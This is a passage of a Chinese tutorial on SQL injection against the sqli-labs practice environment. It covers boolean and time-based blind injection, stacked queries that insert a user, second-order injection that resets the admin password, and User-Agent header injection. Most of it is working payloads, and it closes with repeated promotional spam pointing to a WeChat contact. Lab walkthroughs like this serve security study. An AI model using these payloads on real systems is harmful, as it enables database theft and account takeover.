大于 7 时页面正常,继续判断。
1’ and (length(database())>9)-- -
大于 9 时返回 False,那么就说明当前数据库长度为 8。
1’ and (length(database())=8)-- -
上图也可以看到长度为 8 返回 True。
知道当前数据库长度后接着一个一个的对数据库的每一个字节进行判断。这里介绍给大家两种方法:Ascii判断、字母判断
为什么要分两种方法来讲呢?因为字母判断是需要单引号(')进行操作的,很多服务器都会对这些特殊字符进行一个转义。
首先讲字母判断,判断当前数据库第一个字母。
1’ and (left(database(),1)=‘s’)-- -
页面返回正常,那就说明当前数据库首字母为 s ,接着判断第二个字母。
1’ and (left(database(),2)=‘se’)-- -
这里判断出第二个字母为 e,接着继续判断。(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)
最后这里判断出当前数据库名为:security。
1’ and (left(database(),8)=‘security’)-- -
接着是 Ascii 判断,Ascii 对照表如下:
首先获取当前数据库第一个字母。
1’ and ascii(substr(database(),1,1))=115-- -
当 ascii 码为 115 时页面正常,说明首字母为:s。
继续判断第二个字母。
1’ and ascii(substr(database(),2,1))=101-- -
得到数据库名后,下一步获取表的个数
(后面的操作我们都使用 ascii 函数来判断)
1’ and(select count(table_name) from information_schema.tables where table_schema=‘security’) = 4-- -
页面正常,此时可知当前 security 库中有 4 个表。
接着我们利用 limit 来指定表进行表名长度猜解操作,这里我们指定第四个表 limit 3,1。
1’ and (length((select table_name from information_schema.tables where table_schema = database() limit 3,1)))=5-- -
页面返回正常,得出第四个表长度为 5,继续判断第四个表的表名。
判断表名首字母。
1’ and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),1,1))=117-- -
当 ascii 码为 117 时页面正常,117 对应的 ascii 码为:u。
继续判断表名的第二个字母。
1’ and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 3,1),2,1))=115-- -
当 ascii 码为 115 时页面正常,115 对应的 ascii 码为:s(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)
最后这里判断出表名为:users。
得到表名后判断 users 表中的字段数量。
1’ and (select count(column_name) from information_schema.columns where table_name=“users”)=15-- -
这里得出 users 表中存在 15 个字段数,下一步获取指定字段的长度。
http://192.168.2.40/sqli-labs/Less-5/?id=1’ and ascii(substr((select column_name from information_schema.columns where table_name=“users” limit 9,1),8,1))-- -
得出 limit 9,1 中的字段长度为 8,得知长度后获取字段名,首先判断首字母。
1’ and ascii(substr((select column_name from information_schema.columns where table_name = “users” limit 9,1),1,1))=117-- -
当 ascii 码为 117 时页面正常,117 对应的 ascii 码为:u。
接着判断第二个字母。
1’ and ascii(substr((select column_name from information_schema.columns where table_name = “users” limit 9,1),2,1))=115-- -
当 ascii 码为 115 页面返回正常,115 对应的 ascii 码为:s。(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)
最后判断得出字段名为:username
得知 users 表中第 10 个字段名为 username 后就可以开始脱数据了,首先利用 limit 0,1 判断第一行数据的长度。
1’ and (length((select username from users limit 0,1)))=4-- -
页面返回正常,最后一步获取数据。
1’ and ascii(substr((select username from users limit 0,1),1,1))=68-- -
当 ascii 码为 68 时页面正常,68 对应的 ascii 码为:D。
继续判断第二个字母。
1’ and ascii(substr((select username from users limit 0,1),2,1))=68-- -
当 ascii 码为 117 时页面正常,117 对应的 ascii 码为:u。(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)
最后这里判断出数据内容为:Dumb。
注:盲注一般都不会手工去进行一个注入的,都会采用脚本、工具去跑,只有小可爱才会用手工去注入。
3.5、时间盲注
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据,而采用一种突破注入的技巧。在 mysql 里 函数 sleep() 是延时的意思,sleep(10) 就是数据库延时 10 秒返回内容。判断注入可以使用 ’ and sleep(10),数据库延时 10 秒返回值,网页响应时间至少要 10 秒,根据这个原理来判断存在 SQL 时间注入。
访问本地漏洞环境:http://127.0.0.1/sqli-labs/Less-9/
这里会告诉我们需要传递一个参数 ID,这里 GET 随便给 ID 传递一个值。
回显语句可以看出注入过程我们需要闭合单引号。
利用 and 判断是否存在注入。
1’ and 1=1-- -
页面返回正常,接着继续判断。
此时可以发现不管我们输入什么都只会返回 “You are in…”,原因是在代码中他并没有将查询的数据进行回显,而只是利用了 echo 输入 “You are in…”。
实战中大多场景都是如此,所以我们需要利用时间盲注进行判断是否存在注入。
首先随便输入个数据给 ID 值,然后利用 Burp 进行数据抓取,因为我们要利用 Burp 查看回显时间。
将数据包发送到 Repeater 模块,快捷键(win+r)。
接着我们给 ID 传递一个 sleep 函数,让时间延迟,如果延迟就说明存在时间盲注。
1’and%09sleep(5)–%09-
可以看到页面延迟 5 秒说明存在时间盲注,由于 Burp 他不能有空格,所以这里我们利用 %09 进行绕过,当然也可以用 url 编码的 %20,和 mysql 的内联注释符 /**/。
已知测试存在时间盲注,接下来判断当前数据库的字节长度。
1’%09and%09if(length(database())=8,sleep(3),1)–%09-
可以看到当判断当前数据库长度为 8 时延迟了 3 秒。
接下来我们猜测当前数据库名的首字母。
1’%09and%09if(left(database(),1)=‘s’,sleep(3),1)–%09-
当判断数据库的首字母为 s 时,页面延迟了 3 秒,如果不是则立即加载页面。
接着判断第二个字母。
1’%09and%09if(left(database(),2)=‘se’,sleep(3),1)–%09-
当判断数据库的前两个字母为 se 时,页面延迟了 3 秒,如果不是则立即加载页面(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)。
最终获得数据库名为:security。
得到当前数据库名后获取数据库表中的个数。
1’%09and%09if(((select%09count(table_name)%09from%09information_schema.tables%09where%09table_schema=database())=4),sleep(3),1)–%09-
当判断数据库 security 中的表个数为 4 时延迟了 3 秒。
下一步获取指定表的长度,这里我指定第 4 个表来判断表名的长度。
1’%09and%09if((length(substr((select%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),1))=5),sleep(3),1)–%09-
当表的长度为 5 时延迟了 3 秒,说明第四个表名的长度为 5。
知道表名的长度后下一步判断表名的首字母。
1’%09and%09if((left((select%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),1)=‘u’),sleep(3),1)–%09-
判断表的首字母为 u 时延迟了 3 秒,继续判断第二位字母。
1’%09and%09if((left((select%09table_name%09from%09information_schema.tables%09where%09table_schema=database()%09limit%093,1),2)=‘us’),sleep(3),1)–%09-
当判断表的前两个字母为 us 时,页面延迟了 3 秒,如果不是则立即加载页面(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)。
最终获取到表名为:users。
得到表名后判断表中的字段数量。
1’%09and%09if(((select%09count(column_name)%09from%09information_schema.columns%09where%09table_name=“users”)=18),sleep(3),1)–%09-
当判断字段数量为 18 时延迟了 3 秒,说明当前表中的字段数量为:18。
接着我们利用 limit 指定字段,获取字段字段的长度。
1’%09and%09if((length(substr((select%09column_name%09from%09information_schema.columns%09where%09table_name=“users”%09limit%0913,1),1))=8),sleep(3),1)–%09-
当字段长度为 8 时延迟 3秒。
得知第 14 个字段的长度为 8 后,下一步判断字段名的首字母。
1’%09and%09if((left((select%09column_name%09from%09information_schema.columns%09where%09table_name=“users”%09limit%0913,1),1)=‘p’),sleep(3),1)–%09-
判断首字母为 p 时延迟了 3 秒,继续判断第二字母。
1’%09and%09if((left((select%09column_name%09from%09information_schema.columns%09where%09table_name=“users”%09limit%0913,1),2)=‘pa’),sleep(3),1)–%09-
当判断字段名的前两个字母为 ps 时,页面延迟了 3 秒,如果不是则立即加载页面(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)。
最终得到字段名为:password。
最后就是脱数据了,首先判断第一条数据的长度。
1’%09and%09if((length((select%09password%09from%09users%09limit%090,1))=4),sleep(3),1)–%09-
当判断数据长度为 4 时延迟 3秒,接着下一步判断数据的首字母。
1’%09and%09if((left((select%09password%09from%09users%09limit%090,1),1)=‘D’),sleep(3),1)–%09-
判断完首字母后继续判断第二个字母。
1’%09and%09if((left((select%09password%09from%09users%09limit%090,1),2)=‘Du’),sleep(3),1)–%09-
当判断数据内容的前两个字母为 Du 时页面延迟了 3 秒,如果不是则立即加载页面(这里我就不继续演示判断第三个字母以后的了,方法如上面说的以此类推)。
最终获取数据内容为:Dumb
**3.6、**堆叠注入
堆叠注入,顾名思义,就是将语句堆叠在一起进行查询。
原理很简单,mysql_multi_query(),支持多条 sql 语句同时执行,就是个分隔(;),成堆的执行 sql 语句,例如:
select * from users;show databases;
就同时执行以上两条命令,所以我们可以增删改查,只要权限够。
虽然这个注入姿势很牛逼,但实际遇到很少,其可能受到 API 或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条 sql 语句时才能够使用,利用 mysqli_multi_query() 函数就支持多条 sql 语句同时执行,但实际情况中,如PHP 为了防止 sql 注入机制,往往使用调用数据库的函数是 mysqli_ query() 函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。
访问本地漏洞环境:http://192.168.2.40/sqli-labs/Less-38/
这里会告诉我们需要传递一个参数 ID,这里 GET 随便给 ID 传递一个值。
从回显的 SQL 语句中看出需要闭合单引号('),所以注入时需要注意闭合。
判断是否存在注入。
1’ and 1=1-- -
and 1=1 页面返回正常,接着判断。
1’ and 1=2-- -
and 1=2 时页面返回异常,说明存在注入。
这里我们利用联合注入进行攻击,首先判断字段数。
1’ order by 3-- -
字段数为 3 时返回正常,接着判断。
1’ order by 4-- -
字段数为 4 时报错了,说明字段数为 3。
查看回显位。
-1’union select 1,2,3-- -
这里回显位有 2 个,我们选择第 3 个利用联合注入获取当前数据库名。
-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- -
这里回显出 4 个表,我们选择 users 表来获取里边的字段名。
-1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=“users”-- -
这里得到表和表中的字段名后,我们利用堆叠注入对 users 表进行一个插入数据操作。
-1’;insert into users(id,username,password)values(15,‘hack’,‘hackpw’);-- -
插入后我们登录 phpmyadmin 进行一个查看。
可以看到在最后一行数据中就是我们刚刚插入的数据。
3.7、二次注入
二次注入是存储型注入,可以理解为构造恶意数据存储在数据库后,恶意数据被读取并进入到了 SQL 查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行 SQL 查询时,就发生了 SQL 二次注入。
这里我们首先对代码进行一个分析,不然再开始前会有点懵逼。
我们这里先看 Less-21\login_create.php 的注册用户文件。
这里看我用红色框框框起来的内容。
21-23 行这里都利用了 mysql_escape_string() 函数进行一个 sql 注入的过滤,所以这个注册用户页面是不存在注入的。
接着我们查看修改密码页面的代码。
这里一样看我用红色框框框起来的内容。
首先是 25-28 行,其中 26-28 行都利用了 mysql_escape_string() 函数进行一个 sql 注入的过滤,但是 25 行他并没有使用这个函数进行过滤,而且接收到的变量会带入到 sql 执行语句去,而这个变量就是获取我们用户名的一个操作。
那么我们就可以在注册页面的时候注册一个用户名为:admin’#,这样子到了修改页面后他接收了我们的用户名并存入到 $username 中,最终执行的语句就为:
UPDATE users SET PASSWORD=‘KaTeX parse error: Expected 'EOF', got '#' at position 29: …sername='admin'#̲' and password=…curr_pass’
这样子我们就成功的修改了 admin 用户的密码。
访问本地漏洞环境:http://192.168.2.40/sqli-labs/Less-38/
由于本人英文不好翻译了一下不要介意,这里我们点击用户注册。
注册一个用户名为:admin’#666777的用户。
接着登录 admin’#666777 用户。
登录后我们进行密码修改(这里我修改了下审查元素方面那么看到密码那块)。
修改后我们退出登录,登录 admin 账号,密码为:adminpassword。
这里成功登录 admin 账号,我们成功利用了 admin’#666777 用户对 admin 账号进行一个修改。
3.8、HTTP头注入
HTTP 头原理是后台开发人员为了验证客户端 HTTP_Header(比如常用的Cookie 验证等)或者通过 HTTP_Header 头信息获取客户端的一些信息(例如:User-Agent、Accept 字段等),会对客户端HTTP_Header 进行获取并使用 SQL 语句进行处理,如果此时没有足够的安全考虑,就可能导致基于 HTTP_Header 的注入漏洞。
首先我们对 Less-18\index.php 文件进行代码分析。
这里先看绿色框框的内容,在 73 行中有一条判断判断 uname 和 passwd 的值是否为空,并且这两个函数都有过滤没办法注入,所以要进入这个判断要给这两个值进行参数的传递。
接着 98 行会执行 97 行的 SQL 语句,并且在 100 行中有这么一个判断当 $row1 为真的时候才会进入判断语句中。
知道判断流程后我们看红色框框,首先这里 66-67行接收了我们的 ua 头和 ip 信息,并且会带入 103 行中进行一个插入操作,但是这里的 ua 头我们是可以控制的,所以我们可以在 ua 头中构造 sql 注入语句。
访问本地漏洞环境:http://192.168.2.40/sqli-labs/Less-18/
首先我们要进入第一个 if 判断语句,必须要输入正确的账号和密码,这里输入 Dumb/Dumb 并利用 Burp 进行一个数据包的抓取。
将抓取到的数据包放入 Repeater 模块(Ctrl + r)。
从刚刚代码审计中我们知道 ua 头是可控制的,这里我们对 Ua 头进行一个注入判断。
1’
可以看到这里发生了一个报错,所以我们可以利用报错注入进行一个攻击。
获取当前数据库名,这里为不影响插入语句后面的此处在语句最后加上了一个恒等式,一方面是为了闭合后台语句的单引号,另一方面是为了保证当我们语句拼接入后台后不影响后续语句的运行。
1’and updatexml(1,concat(0x7e,database(),0x7e),1) and ‘1’='1
得到数据库名为:security。
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
cd849f9504c48bb02882ef8d.png)
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-6Nk1Ge12-1712559654646)]